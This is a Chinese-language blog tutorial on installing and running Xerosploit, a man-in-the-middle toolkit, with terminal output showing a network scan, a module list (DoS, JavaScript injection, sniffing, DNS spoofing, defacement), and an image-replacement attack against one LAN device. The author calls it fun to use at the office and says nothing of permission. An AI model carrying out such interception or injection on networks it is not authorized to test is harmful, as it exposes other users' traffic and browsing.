中间人攻击工具(Xerosploit)

简介

Xerosploit是一个渗透测试工具包,它的目的是实现中间人攻击。它附带着各种有效的攻击模块,并且还允许执行拒绝服务攻击和端口扫描

安装

  • 下载
    git clone https://github.com/LionSec/xerosploit.git
  • 安装
    cd xerosploit && sudo python install.py
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    [email protected]:~# cd xerosploit && sudo python install.py
    ┌══════════════════════════════════════════════════════════════┐
    █ █
    █ Xerosploit Installer █
    █ █
    └══════════════════════════════════════════════════════════════┘
    [++] Please choose your operating system.
    1) Ubuntu / Kali linux / Others
    2) Parrot OS
    >>> 1

输入对应的系统就可以自动安装了
Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal.
显示这个表示安装成功

使用

输入
xerosploit
打开工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38


██╗ ██╗███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
╚███╔╝ █████╗ ██████╔╝██║ ██║███████╗██████╔╝██║ ██║ ██║██║ ██║
██╔██╗ ██╔══╝ ██╔══██╗██║ ██║╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
██╔╝ ██╗███████╗██║ ██║╚██████╔╝███████║██║ ███████╗╚██████╔╝██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

[ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█ █
█ Your Network Configuration █
█ █
└═════════════════════════════════════════════════════════════════════════════┘

╒══════════════╤═══════════════════╤═══════════╤═════════╤════════════╕
│ IP Address │ MAC Address │ Gateway │ Iface │ Hostname │
╞══════════════╪═══════════════════╪═══════════╪═════════╪════════════╡
│ │ │ │ │ │
├──────────────┼───────────────────┼───────────┼─────────┼────────────┤
│ 1.1.1.11 │ 08:00:27:7B:3D:E7 │ 1.1.1.1 │ eth0 │ kali │
╘══════════════╧═══════════════════╧═══════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║ ║ XeroSploit is a penetration testing toolkit whose goal is to ║
║ Information ║ perform man in the middle attacks for testing purposes. ║
║ ║ It brings various modules that allow to realise efficient attacks. ║
║ ║ This tool is Powered by Bettercap and Nmap. ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

如果你要实现中间人攻击,比如你要让受害者访问的网站的图片全部变为固定的一张照片,你可以这样做
输入help查看下菜单选项

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║ ║ ║
║ ║ scan : Map your network. ║
║ ║ ║
║ ║ iface : Manually set your network interface. ║
║ COMMANDS ║ ║
║ ║ gateway : Manually set your gateway. ║
║ ║ ║
║ ║ start : Skip scan and directly set your target IP address. ║
║ ║ ║
║ ║ rmlog : Delete all xerosploit logs. ║
║ ║ ║
║ ║ help : Display this help message. ║
║ ║ ║
║ ║ exit : Close Xerosploit. ║
║ ║ ║
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

输入scan扫描一下网络

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Xero ➮ scan

[++] Mapping your network ...

[+]═══════════[ Devices found on your network ]═══════════[+]

╔════════════╦═══════════════════╦══════════════════════════════╗
║ IP Address ║ Mac Address ║ Manufacturer ║
╠════════════╬═══════════════════╬══════════════════════════════╣
║ 1.1.1.1 ║ B8:F8:83:76:7E:E5 ║ (Tp-link Technologies) ║
║ 1.1.1.2 ║ A0:8C:FD:D1:2C:C6 ║ (Hewlett Packard) ║
║ 1.1.1.3 ║ A0:8C:FD:D2:25:B8 ║ (Hewlett Packard) ║
║ 1.1.1.5 ║ C0:CC:F8:42:DD:D5 ║ (Apple) ║
║ 1.1.1.6 ║ A0:8C:FD:D1:E1:8E ║ (Hewlett Packard) ║
║ 1.1.1.7 ║ A0:8C:FD:D5:81:DD ║ (Hewlett Packard) ║
║ 1.1.1.9 ║ C8:6F:1D:22:37:A2 ║ (Apple) ║
║ 1.1.1.10 ║ 08:00:37:A1:64:05 ║ (Fuji-xerox) ║
║ 1.1.1.12 ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology) ║
║ 1.1.1.14 ║ B0:E2:35:43:62:43 ║ (Xiaomi Communications) ║
║ 1.1.1.11 ║ 08:00:27:7B:3D:E7 ║ (This device) ║
║ 1.1.1.254 ║ ║ ║
║ ║ ║ ║
╚════════════╩═══════════════════╩══════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮

扫描的信息很详细,连一些基础的设备信息都扫描出来了
接下来输入各种信息,看下面就好

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
Xero ➮ 1.1.1.12

[++] 1.1.1.12 has been targeted.

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ help

╔═════════╦══════════════════════════════════════════════════════════════════════╗
║ ║ ║
║ ║ pscan : Port Scanner ║
║ ║ ║
║ ║ dos : DoS Attack ║
║ ║ ║
║ ║ ping : Ping Request ║
║ ║ ║
║ ║ injecthtml : Inject Html code ║
║ ║ ║
║ ║ injectjs : Inject Javascript code ║
║ ║ ║
║ ║ rdownload : Replace files being downloaded ║
║ ║ ║
║ ║ sniff : Capturing information inside network packets ║
║ MODULES ║ ║
║ ║ dspoof : Redirect all the http traffic to the specified one IP ║
║ ║ ║
║ ║ yplay : Play background sound in target browser ║
║ ║ ║
║ ║ replace : Replace all web pages images with your own one ║
║ ║ ║
║ ║ driftnet : View all images requested by your targets ║
║ ║ ║
║ ║ move : Shaking Web Browser content ║
║ ║ ║
║ ║ deface : Overwrite all web pages with your HTML code ║
║ ║ ║
╚═════════╩══════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ replace

┌══════════════════════════════════════════════════════════════┐
█ █
█ Image Replace █
█ █
█ Replace all web pages images with your own one █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮ run

[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)

Xero»modules»replace ➮ /root/a.png

[++] All images will be replaced by /root/a.png

[++] Press 'Ctrl + C' to stop .

效果类似下面这样

评价

在公司里还是挺好玩的,好评,各种中间人攻击的东西几乎都有

Having Fun

欢迎关注我的其它发布渠道